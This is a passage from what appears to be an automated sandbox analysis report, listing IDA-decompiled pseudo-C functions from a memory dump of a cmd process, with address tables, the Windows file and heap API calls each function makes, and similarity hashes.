							}
						}
					}
					CloseHandle(_t43);
					goto L16;
				} else {
					_t15 = 0;
					L17:
					return E011E6FD0(_t15, _t32, _v8 ^ _t44, _t41, _t42, _t43);
				}
			}




















                                    0x011f554f
                                    0x011f5557
                                    0x011f555e
                                    0x011f5564
                                    0x011f5566
                                    0x011f556a
                                    0x011f558a
                                    0x011f558f
                                    0x011f564e
                                    0x011f564e
                                    0x00000000
                                    0x011f564e
                                    0x011f5597
                                    0x011f55a3
                                    0x011f55cb
                                    0x011f55d7
                                    0x011f55e4
                                    0x011f55f0
                                    0x011f55f2
                                    0x011f55f9
                                    0x011f560e
                                    0x011f5612
                                    0x011f5618
                                    0x011f5624
                                    0x011f5629
                                    0x011f562b
                                    0x011f5632
                                    0x011f5634
                                    0x011f5634
                                    0x011f5632
                                    0x011f5641
                                    0x011f5641
                                    0x011f5612
                                    0x011f55f9
                                    0x011f55f0
                                    0x011f55d7
                                    0x011f5648
                                    0x00000000
                                    0x011f556c
                                    0x011f556c
                                    0x011f5651
                                    0x011f5661
                                    0x011f5661

                                    APIs
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 011F5584
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 011F55BE
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 011F5601
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F5608
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 011F563A
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F5641
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 011F5648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                    • String ID: PE
                                    • API String ID: 3093239467-4258593460
                                    • Opcode ID: 0a407dce7c18736993dfde85094fb45ce55dfc38be941e2c8ea29e06575ca7e0
                                    • Instruction ID: 72bdf582741cb09c69ab96785492e3546fa00ff7b84a992b2119fa9095647a1d
                                    • Opcode Fuzzy Hash: 0a407dce7c18736993dfde85094fb45ce55dfc38be941e2c8ea29e06575ca7e0
                                    • Instruction Fuzzy Hash: 3C31E534600214A7EF68A7696C0CFBE7AAB9B94B25F44021CFF61D65C4DF318942CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F84FE, Relevance: 13.6, APIs: 9, Instructions: 96fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E011F84FE(void* __eax, void* __edx, void* __eflags, DWORD* _a4, intOrPtr _a8, long _a12) {
				char _v8;
				void* __ecx;
				void* _t12;
				void* _t14;
				LONG* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void** _t24;
				void** _t26;
				void* _t38;
				void* _t39;
				void* _t41;
				DWORD* _t42;
				LONG* _t44;
				void* _t45;

				_t24 = _t26;
				_t39 = __edx;
				__imp___get_osfhandle( *_t24, _t38, _t41, _t23, _t26);
				FlushFileBuffers(__eax);
				_t28 =  *_t24;
				E011DDB92( *_t24);
				_t30 = E011D5DB5(_t39, 0, _t28, _t28);
				 *_t24 = _t30;
				if(_t30 != 0xffffffff) {
					_t42 = _a4;
					_t12 =  ~_t42;
					__imp___get_osfhandle(2);
					SetFilePointer(_t12, _t30, _t12, 0);
					_t14 =  &_v8;
					__imp___get_osfhandle(0);
					_t15 = ReadFile(_t14,  *_t24, _a12, _t42, _t14);
					if(_t15 != 0) {
						if(_v8 != _t42) {
							goto L3;
						} else {
							_push(_t42);
							_push(_a12);
							_push(_a8);
							L011E82C7();
							_t30 =  *_t24;
							_t45 = _t45 + 0xc;
							_t44 = _t15;
							E011DDB92( *_t24);
							if(_t44 != 0) {
								goto L4;
							} else {
								_t21 = E011D5DB5(_t39, 1, _t39, _t39);
								 *_t24 = _t21;
								if(_t21 == 0xffffffff) {
									goto L1;
								} else {
									__imp___get_osfhandle(2);
									SetFilePointer(_t21, _t21, _t44, _t44);
									_t19 = 0;
								}
							}
						}
					} else {
						L3:
						_t30 =  *_t24;
						E011DDB92( *_t24);
						L4:
						 *_t24 =  *_t24 | 0xffffffff;
						goto L1;
					}
				} else {
					L1:
					E011DC5A2(_t30, 0x4000271f, 1, _t39);
					_t19 = 1;
				}
				return _t19;
			}



















                                    0x011f8505
                                    0x011f8509
                                    0x011f850d
                                    0x011f8515
                                    0x011f851b
                                    0x011f851d
                                    0x011f852d
                                    0x011f852f
                                    0x011f8534
                                    0x011f854e
                                    0x011f8557
                                    0x011f855b
                                    0x011f8563
                                    0x011f856b
                                    0x011f8575
                                    0x011f857d
                                    0x011f8585
                                    0x011f8596
                                    0x00000000
                                    0x011f8598
                                    0x011f8598
                                    0x011f8599
                                    0x011f859c
                                    0x011f859f
                                    0x011f85a4
                                    0x011f85a6
                                    0x011f85a9
                                    0x011f85ab
                                    0x011f85b2
                                    0x00000000
                                    0x011f85b4
                                    0x011f85bb
                                    0x011f85c0
                                    0x011f85c5
                                    0x00000000
                                    0x011f85cb
                                    0x011f85d0
                                    0x011f85d8
                                    0x011f85de
                                    0x011f85de
                                    0x011f85c5
                                    0x011f85b2
                                    0x011f8587
                                    0x011f8587
                                    0x011f8587
                                    0x011f8589
                                    0x011f858e
                                    0x011f858e
                                    0x00000000
                                    0x011f858e
                                    0x011f8536
                                    0x011f8536
                                    0x011f853e
                                    0x011f8548
                                    0x011f8548
                                    0x011f85e6

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F850D
                                    • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 011F8515
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    • _get_osfhandle.MSVCRT ref: 011F855B
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 011F8563
                                    • _get_osfhandle.MSVCRT ref: 011F8575
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 011F857D
                                    • memcmp.MSVCRT ref: 011F859F
                                    • _get_osfhandle.MSVCRT ref: 011F85D0
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011F85D8
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
                                    • String ID:
                                    • API String ID: 332413853-0
                                    • Opcode ID: a50de4650c369f47b70831d865aa193a37e52136944a00e5d510f2459573d465
                                    • Instruction ID: 4d4b5de74498c1a2dc1286201c72742d6594ea340d43259d74b5be6da6e05bb6
                                    • Opcode Fuzzy Hash: a50de4650c369f47b70831d865aa193a37e52136944a00e5d510f2459573d465
                                    • Instruction Fuzzy Hash: 5D21D231A00115ABDF2C9FA9AC4DE7B3BAAEF95364F004619F515C61D4DF714C40C761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D81E0, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 253COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 74%
                                    			E011D81E0(intOrPtr _a4, long _a8, signed int* _a16) {
				signed int _v8;
				void* _v12;
				int _v20;
				char _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void _v548;
				void* _v552;
				long _v556;
				char _v560;
				int _v564;
				void* _v568;
				void* _v572;
				void* _v580;
				void _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				long _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t93;
				long _t95;
				signed int _t97;
				signed int _t111;
				WCHAR* _t117;
				void* _t119;
				signed int _t120;
				WCHAR* _t122;
				int _t123;
				signed char* _t126;
				WCHAR* _t127;
				WCHAR* _t129;
				signed int _t134;
				WCHAR* _t135;
				void* _t136;
				char _t140;
				void* _t141;
				signed int* _t142;
				signed int _t153;
				signed int _t164;
				intOrPtr _t167;
				void* _t168;
				long _t169;
				WCHAR* _t170;
				char _t172;
				void* _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;

				_t176 = (_t174 & 0xfffffff8) - 0x44c;
				_t93 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t93 ^ _t176;
				_t95 = _a8;
				_t142 = _a16;
				_v1104 = _t95;
				_v1096 =  *(_t95 + 2) & 0x0000ffff;
				_t140 = 1;
				_t97 =  *_t142;
				_v1088 = _t142;
				_v560 = 1;
				_t167 = _a4;
				_t172 = 0;
				_v1100 = _t97 & 0x00002000;
				_v1092 = _t97 & 0x00000800;
				_v556 = 0x104;
				_v564 = 0;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_t178 = _t176 + 0x18;
				if(E011E0C70( &_v1084, 0x7fe9) < 0 || E011E0C70( &_v548, 0x7fe9) < 0) {
					L23:
					_t172 = _t140;
					goto L24;
				} else {
					if(_v1100 != 0 || _v1092 != 0 ||  *((char*)(_t167 + 0x11)) != 0) {
						L6:
						_t161 = _v1104;
						if(( *(_t161 + 4) & 0x00000010) != 0) {
							L24:
							_t140 = _t172;
							L25:
							_t172 = _t140;
							L26:
							_t140 = _t172;
							L27:
							_t172 = _t140;
							L17:
							__imp__??_V@YAXPAX@Z(_v28);
							__imp__??_V@YAXPAX@Z(_v564);
							_pop(_t168);
							_pop(_t173);
							_pop(_t141);
							return E011E6FD0(_t172, _t141, _v8 ^ _t178, _t161, _t168, _t173);
						}
						_t151 = _v564;
						if(_v564 == 0) {
							_t151 =  &_v1084;
						}
						_t111 = _t161 + 0x30 + (_v1096 & 0x0000ffff) * 2;
						_t161 = _v556;
						_v1096 = _t111;
						if(E011E51C9(_t151, _v556,  *((intOrPtr*)(_t167 + 4)), _t111) != 0) {
							_push(_v1096);
							E011DC5A2(_t151, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
							_t178 = _t178 + 0x10;
							goto L25;
						} else {
							_t152 = _v28;
							if(_v28 == 0) {
								_t152 =  &_v548;
							}
							_t163 = _v20;
							if(E011E51C9(_t152, _v20,  *((intOrPtr*)(_t167 + 4)), _v1104 + 0x30) != 0) {
								_t117 = _v564;
								__eflags = _t117;
								if(_t117 == 0) {
									_t117 =  &_v1084;
								}
								_t153 =  &_v548;
								E011E0D89(_t163, _t117);
							}
							if(_v1092 != _t172) {
								_t153 = _v28;
								__eflags = _t153;
								if(_t153 == 0) {
									_t153 =  &_v548;
								}
								_t161 = 0x232c;
								_t119 = E011F9583(_t153, 0x232c, 0x2328);
								__eflags = _t119 - _t140;
								if(_t119 == _t140) {
									goto L12;
								} else {
									__eflags =  *0x11fd544 - _t172; // 0x0
									if(__eflags == 0) {
										goto L26;
									}
									goto L25;
								}
							} else {
								L12:
								_t120 = _v1088;
								_t169 = _v1104;
								_t164 =  *(_t169 + 4);
								_t154 = _t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000;
								if(((_t120 & 0xffffff00 | (_t164 & 0x00000001) != 0x00000000) & (_t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000)) != 0) {
									_t122 = _v564;
									__eflags = _t122;
									if(_t122 == 0) {
										_t122 =  &_v1084;
									}
									_t161 = _t164 & 0xfffffffe;
									_t123 = SetFileAttributesW(_t122, _t164 & 0xfffffffe);
									__eflags = _t123;
									if(_t123 != 0) {
										goto L13;
									} else {
										_push(_t172);
										_push(GetLastError());
										E011DC5A2(_t154);
										goto L27;
									}
								}
								L13:
								_t155 = _v28;
								if(_v28 == 0) {
									_t155 =  &_v548;
								}
								_t161 =  *(_t169 + 4);
								if(E011D83F2(_t155,  *(_t169 + 4)) != 0) {
									_t155 = _v564;
									__eflags = _v564;
									if(_v564 == 0) {
										_t155 =  &_v1084;
									}
									_t161 =  *(_t169 + 4);
									_t170 = E011D83F2(_t155,  *(_t169 + 4));
									__eflags = _t170;
									if(_t170 == 0) {
										goto L15;
									} else {
										__eflags = _t170 - 0x4d3;
										if(_t170 == 0x4d3) {
											goto L27;
										}
										_t129 = _v28;
										__eflags = _t129;
										if(_t129 == 0) {
											_t129 =  &_v548;
										}
										E011E25D9(L"%s\r\n");
										E011DC5A2(_t155, _t170, _t172, _t129);
										_t178 = _t178 + 0x10;
										goto L17;
									}
								} else {
									L15:
									_t126 = _v1088;
									_t126[0x60] = _t126[0x60] + 1;
									if( *0x1213cc9 != 0 && ( *_t126 & 0x00000010) != 0) {
										_t127 = _v28;
										__eflags = _t127;
										if(_t127 == 0) {
											_t127 =  &_v548;
										}
										E011DC108(_t155, 0x400023a1, _t140, _t127);
										_t178 = _t178 + 0xc;
									}
									goto L17;
								}
							}
						}
					} else {
						_t134 = E011D8512( *((intOrPtr*)(_t167 + 8)),  *((intOrPtr*)(_t167 + 0xc)));
						_v1100 = _t134;
						if(_t134 != 0) {
							_t159 = _v564;
							__eflags = _v564;
							if(_v564 == 0) {
								_t159 =  &_v1084;
							}
							_t161 = _v556;
							_t135 = E011E51C9(_t159, _v556,  *((intOrPtr*)(_t167 + 4)), _t134);
							__eflags = _t135;
							if(_t135 == 0) {
								_t160 = _v564;
								 *((char*)(_t167 + 0x11)) = _t140;
								__eflags = _v564;
								if(_v564 == 0) {
									_t160 =  &_v1084;
								}
								_t161 = 0x234e;
								_t136 = E011F9583(_t160, 0x234e, 0x2328);
								__eflags = _t136 - _t140;
								if(_t136 != _t140) {
									goto L23;
								} else {
									goto L6;
								}
							} else {
								_push(_v1100);
								E011DC5A2(_t159, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
								_t178 = _t178 + 0x10;
								goto L23;
							}
						}
						goto L6;
					}
				}
			}





























































                                    0x011d81e8
                                    0x011d81ee
                                    0x011d81f5
                                    0x011d81fc
                                    0x011d81ff
                                    0x011d8202
                                    0x011d820c
                                    0x011d8210
                                    0x011d8211
                                    0x011d8213
                                    0x011d821f
                                    0x011d8227
                                    0x011d822a
                                    0x011d822c
                                    0x011d823b
                                    0x011d8240
                                    0x011d824d
                                    0x011d8254
                                    0x011d825c
                                    0x011d8268
                                    0x011d826f
                                    0x011d8280
                                    0x011d8285
                                    0x011d8298
                                    0x011f01dd
                                    0x011f01dd
                                    0x00000000
                                    0x011d82b7
                                    0x011d82bb
                                    0x011d82e0
                                    0x011d82e0
                                    0x011d82e8
                                    0x011f01df
                                    0x011f01df
                                    0x011f01e1
                                    0x011f01e1
                                    0x011f01e3
                                    0x011f01e3
                                    0x011f01e5
                                    0x011f01e5
                                    0x011d83b4
                                    0x011d83bb
                                    0x011d83c9
                                    0x011d83d9
                                    0x011d83da
                                    0x011d83db
                                    0x011d83e6
                                    0x011d83e6
                                    0x011d82ee
                                    0x011d82f7
                                    0x011f0216
                                    0x011f0216
                                    0x011d8307
                                    0x011d830a
                                    0x011d8315
                                    0x011d8320
                                    0x011f021f
                                    0x011f022d
                                    0x011f0232
                                    0x00000000
                                    0x011d8326
                                    0x011d8326
                                    0x011d832f
                                    0x011f0237
                                    0x011f0237
                                    0x011d8339
                                    0x011d834e
                                    0x011f0243
                                    0x011f024a
                                    0x011f024c
                                    0x011f024e
                                    0x011f024e
                                    0x011f0253
                                    0x011f025a
                                    0x011f025a
                                    0x011d8358
                                    0x011f0264
                                    0x011f026b
                                    0x011f026d
                                    0x011f026f
                                    0x011f026f
                                    0x011f027b
                                    0x011f0280
                                    0x011f0285
                                    0x011f0287
                                    0x00000000
                                    0x011f028d
                                    0x011f028d
                                    0x011f0293
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0299
                                    0x011d835e
                                    0x011d835e
                                    0x011d835e
                                    0x011d8362
                                    0x011d836c
                                    0x011d836f
                                    0x011d837a
                                    0x011f029e
                                    0x011f02a5
                                    0x011f02a7
                                    0x011f02a9
                                    0x011f02a9
                                    0x011f02ad
                                    0x011f02b2
                                    0x011f02b8
                                    0x011f02ba
                                    0x00000000
                                    0x011f02c0
                                    0x011f02c0
                                    0x011f02c7
                                    0x011f02c8
                                    0x00000000
                                    0x011f02ce
                                    0x011f02ba
                                    0x011d8380
                                    0x011d8380
                                    0x011d8389
                                    0x011d83e9
                                    0x011d83e9
                                    0x011d838b
                                    0x011d8395
                                    0x011f02d4
                                    0x011f02db
                                    0x011f02dd
                                    0x011f02df
                                    0x011f02df
                                    0x011f02e3
                                    0x011f02eb
                                    0x011f02ed
                                    0x011f02ef
                                    0x00000000
                                    0x011f02f5
                                    0x011f02f5
                                    0x011f02fb
                                    0x00000000
                                    0x00000000
                                    0x011f0301
                                    0x011f0308
                                    0x011f030a
                                    0x011f030c
                                    0x011f030c
                                    0x011f0319
                                    0x011f0320
                                    0x011f0325
                                    0x00000000
                                    0x011f0325
                                    0x011d839b
                                    0x011d839b
                                    0x011d839b
                                    0x011d839f
                                    0x011d83a9
                                    0x011f032d
                                    0x011f0334
                                    0x011f0336
                                    0x011f0338
                                    0x011f0338
                                    0x011f0346
                                    0x011f034b
                                    0x011f034b
                                    0x00000000
                                    0x011d83a9
                                    0x011d8395
                                    0x011d8358
                                    0x011d82c9
                                    0x011d82cf
                                    0x011d82d4
                                    0x011d82da
                                    0x011f01a4
                                    0x011f01ab
                                    0x011f01ad
                                    0x011f01af
                                    0x011f01af
                                    0x011f01b3
                                    0x011f01be
                                    0x011f01c3
                                    0x011f01c5
                                    0x011f01ec
                                    0x011f01f3
                                    0x011f01f6
                                    0x011f01f8
                                    0x011f01fa
                                    0x011f01fa
                                    0x011f0203
                                    0x011f0208
                                    0x011f020d
                                    0x011f020f
                                    0x00000000
                                    0x011f0211
                                    0x00000000
                                    0x011f0211
                                    0x011f01c7
                                    0x011f01c7
                                    0x011f01d5
                                    0x011f01da
                                    0x00000000
                                    0x011f01da
                                    0x011f01c5
                                    0x00000000
                                    0x011d82da
                                    0x011d82bb

                                    APIs
                                    • memset.MSVCRT ref: 011D8254
                                    • memset.MSVCRT ref: 011D8280
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83BB
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: %s
                                    • API String ID: 2221118986-3043279178
                                    • Opcode ID: b29e2c05960ec1431416e3afc94a7de5d6c8c4c1a057eba34597a5caa911ab17
                                    • Instruction ID: 7cca5aba5fa2d5464b9d8b81d44404aa2f8a26b34c34bb3d234dcb151feb8e8c
                                    • Opcode Fuzzy Hash: b29e2c05960ec1431416e3afc94a7de5d6c8c4c1a057eba34597a5caa911ab17
                                    • Instruction Fuzzy Hash: 3591A2712083429BD73DDF58C894BAFB7E5BF98204F04491DFA8987251DB34E944C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D8F70, Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 49%
                                    			E011D8F70(signed int __ecx, wchar_t* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				char _v20;
				wchar_t* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				wchar_t* _v52;
				signed int _v56;
				int _v60;
				wchar_t* _v64;
				intOrPtr _v68;
				signed int _v72;
				int _v76;
				signed short* _v80;
				void* _v84;
				signed short* _v88;
				signed short* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				signed short* _v104;
				void* __edi;
				void* __ebp;
				signed int _t127;
				int _t130;
				signed int* _t131;
				intOrPtr* _t135;
				signed int _t139;
				intOrPtr _t142;
				intOrPtr _t143;
				short* _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				signed short* _t149;
				wchar_t* _t150;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				intOrPtr _t157;
				signed int _t158;
				signed short* _t162;
				void _t163;
				signed int _t165;
				intOrPtr _t167;
				signed int _t171;
				signed int _t173;
				signed short* _t175;
				intOrPtr* _t176;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				intOrPtr _t181;
				signed short* _t190;
				wchar_t* _t191;
				intOrPtr* _t192;
				intOrPtr* _t195;
				signed int _t197;
				void* _t198;
				void* _t199;
				intOrPtr* _t203;
				intOrPtr* _t206;
				intOrPtr* _t209;
				void* _t212;
				intOrPtr* _t213;
				signed int _t219;
				signed short* _t220;
				signed short* _t226;
				signed short* _t228;
				wchar_t* _t229;
				short* _t230;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				signed short* _t237;
				void* _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				signed short* _t244;
				signed short* _t247;
				wchar_t* _t252;
				WCHAR* _t254;
				void* _t255;
				signed int _t256;
				intOrPtr* _t258;
				signed int _t260;
				void* _t262;
				intOrPtr* _t265;
				signed int _t267;
				signed int _t268;
				intOrPtr* _t269;
				signed short* _t270;
				signed short* _t271;
				signed short* _t272;
				signed short* _t273;
				intOrPtr _t276;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t282;

				_t229 = __edx;
				_push(0xfffffffe);
				_push(0x11fbe58);
				_push(E011E7290);
				_push( *[fs:0x0]);
				_t279 = _t278 - 0x54;
				_t127 =  *0x11fd0b4; // 0x2833377e
				_v12 = _v12 ^ _t127;
				_push(_t127 ^ _t277);
				 *[fs:0x0] =  &_v20;
				_v52 = __edx;
				_v56 = __ecx;
				_v60 = 0;
				_t252 = 0;
				_v40 = 0;
				_t262 = 0;
				_v36 = 0;
				_v8 = 0;
				_t130 = E011E00B0(0x4000);
				_v60 = _t130;
				if(_t130 == 0) {
					_t171 = _v56;
					if(_t171 == 0) {
						L74:
						_t131 = _a4;
						L75:
						 *_t131 = 0;
						L23:
						_v8 = 0xfffffffe;
						E011D93F4(_t252);
						 *[fs:0x0] = _v20;
						return _t262;
					}
					__imp__longjmp(_t171, 0xffffffff);
					L91:
					_t173 = _v56;
					if(_t173 == 0) {
						L73:
						_t262 = _v36;
						goto L74;
					}
					__imp__longjmp(_t173, 0xffffffff);
					L93:
					_t230 = _t229 - 2;
					_v64 = _t230;
					_v68 = _t173 - 1;
					L20:
					 *_t230 = 0;
					_t175 = _v52;
					_t254 = _v40;
					L21:
					_t135 = _v32;
					_v32 = _t135 + 2;
					_t255 = E011DCFBC(_t254);
					_v44 = _t255;
					if( *_t135 == 0x3a) {
						if( *0x1213cc9 == 0 || _t255 == 0) {
							goto L22;
						} else {
							_t190 = _v32;
							_t139 =  *_t190 & 0x0000ffff;
							if(_t139 == 0x7e) {
								_t191 =  &(_t190[1]);
								_v32 = _t191;
								_t256 = wcstol(_t191,  &_v32, 0);
								_v72 = _t256;
								_t176 = _v44;
								if(_t256 >= 0) {
									L50:
									_t192 = _t176;
									_t66 = _t192 + 2; // 0x11e7292
									_t231 = _t66;
									do {
										_t142 =  *_t192;
										_t192 = _t192 + 2;
									} while (_t142 != 0);
									if(_t256 >= _t192 - _t231 >> 1) {
										_t195 = _t176;
										_t109 = _t195 + 2; // 0x11e7292
										_t232 = _t109;
										do {
											_t143 =  *_t195;
											_t195 = _t195 + 2;
										} while (_t143 != 0);
										_t197 = _t195 - _t232 >> 1;
										L54:
										if(_t197 < 0) {
											_t256 = 0;
											L58:
											_v72 = _t256;
											_t144 = _v32;
											if( *_t144 != 0x2c) {
												_t257 = _t176 + _t256 * 2;
												_t265 = _t176 + _t256 * 2;
												_t104 = _t265 + 2; // 0x2
												_t198 = _t104;
												do {
													_t145 =  *_t265;
													_t265 = _t265 + 2;
												} while (_t145 != 0);
												L72:
												_t267 = _t265 - _t198 >> 1;
												L63:
												_v48 = _t267;
												_t233 = _t176;
												_t78 = _t233 + 2; // 0x11e7292
												_t199 = _t78;
												do {
													_t146 =  *_t233;
													_t233 = _t233 + 2;
												} while (_t146 != 0);
												_t255 = _v44;
												E011E6826(_t255, (_t233 - _t199 >> 1) + 1, _t257, _t267);
												if( *((short*)(_t255 + _t267 * 2)) != 0) {
													 *((short*)(_t255 + _t267 * 2)) = 0;
												}
												_t149 = _v32;
												_t237 =  &(_t149[1]);
												_v32 = _t237;
												_t131 = _a4;
												if(( *_t149 & 0x0000ffff) != _a8) {
													L98:
													_t262 = _v36;
													_t252 = _v40;
													goto L75;
												} else {
													 *_t131 = _t237 - _v52 >> 1;
													L45:
													_t262 = _t255;
													_v36 = _t262;
													_t252 = _v40;
													goto L23;
												}
											}
											_t150 = _t144 + 2;
											_v32 = _t150;
											_t268 = wcstol(_t150,  &_v32, 0);
											_v48 = _t268;
											if(_t268 < 0) {
												_t203 = _t176 + _t256 * 2;
												_t240 = _t203 + 2;
												do {
													_t152 =  *_t203;
													_t203 = _t203 + 2;
												} while (_t152 != 0);
												_t267 = _t268 + (_t203 - _t240 >> 1);
												_v48 = _t267;
												if(_t267 < 0) {
													_t267 = 0;
												}
											}
											_v48 = _t267;
											_t257 = _t176 + _t256 * 2;
											_t206 = _t257;
											_t76 = _t206 + 2; // 0x2
											_t241 = _t76;
											do {
												_t153 =  *_t206;
												_t206 = _t206 + 2;
											} while (_t153 != 0);
											if(_t267 >= _t206 - _t241 >> 1) {
												_t269 = _t257;
												_t99 = _t269 + 2; // 0x2
												_t198 = _t99;
												do {
													_t154 =  *_t269;
													_t269 = _t269 + 2;
												} while (_t154 != 0);
												goto L72;
											}
											goto L63;
										}
										_t209 = _t176;
										_t67 = _t209 + 2; // 0x11e7292
										_t242 = _t67;
										do {
											_t155 =  *_t209;
											_t209 = _t209 + 2;
										} while (_t155 != 0);
										if(_t256 >= _t209 - _t242 >> 1) {
											_t258 = _t176;
											_t110 = _t258 + 2; // 0x11e7292
											_t212 = _t110;
											do {
												_t156 =  *_t258;
												_t258 = _t258 + 2;
											} while (_t156 != 0);
											_t256 = _t258 - _t212 >> 1;
										}
										goto L58;
									}
									_t197 = _t256;
									goto L54;
								}
								_t213 = _t176;
								_t64 = _t213 + 2; // 0x11e7292
								_t243 = _t64;
								do {
									_t157 =  *_t213;
									_t213 = _t213 + 2;
								} while (_t157 != 0);
								_t256 = _t256 + (_t213 - _t243 >> 1);
								_v72 = _t256;
								goto L50;
							}
							if(_t139 == 0x2a) {
								_t190 =  &(_t190[1]);
								_v32 = _t190;
								_v76 = 1;
							} else {
								_v76 = 0;
							}
							_t270 = _t190;
							_v104 = _t270;
							_t244 = _t270;
							while(1) {
								_t158 =  *_t190 & 0x0000ffff;
								if(_t158 == 0 || _t158 == 0x3d) {
									break;
								}
								_t190 =  &(_t244[1]);
								_v32 = _t190;
								_t244 = _t190;
							}
							if( *_t190 == 0) {
								L100:
								_t252 = _v40;
								goto L73;
							}
							_t178 = _t244 - _t270;
							_t179 = _t178 >> 1;
							if(_t178 == 0) {
								_t180 = _v56;
								if(_t180 == 0) {
									goto L100;
								}
								E011DC5A2(_t190, 0x234a, 1, _t244);
								_t282 = _t279 + 0xc;
								__imp__longjmp(_t180, 0xffffffff);
								L103:
								_t255 = _v44;
								memcpy(_t255, ??, ??);
								E011E1040(_v56 + _v56 + _t255, 0x2000 - _v56, _t270);
								goto L45;
							}
							_t162 =  &(_t244[1]);
							_t271 = _t162;
							_v80 = _t271;
							while(1) {
								_t247 = _t162;
								_v32 = _t162;
								_t219 =  *_t162 & 0x0000ffff;
								if(_t219 == 0 || _t219 == _a8) {
									break;
								}
								_t162 =  &(_t247[1]);
							}
							_t131 = _a4;
							if( *_t162 == 0) {
								goto L98;
							}
							_t220 =  &(_t247[1]);
							_v32 = _t220;
							_v56 = _t247 - _t271 >> 1;
							 *_t131 = _t220 - _v52 >> 1;
							if( *_t255 == 0) {
								goto L45;
							}
							_t272 = _v60;
							_t163 = E011E1040(_t272, 0x2000, _t255);
							_v88 = _t272;
							_v84 = _t255;
							while(1) {
								L42:
								__imp___wcsnicmp(_t272, _v104, _t179);
								_t282 = _t279 + 0xc;
								if(_t163 != 0) {
									break;
								}
								_t270 =  &(_t272[_t179]);
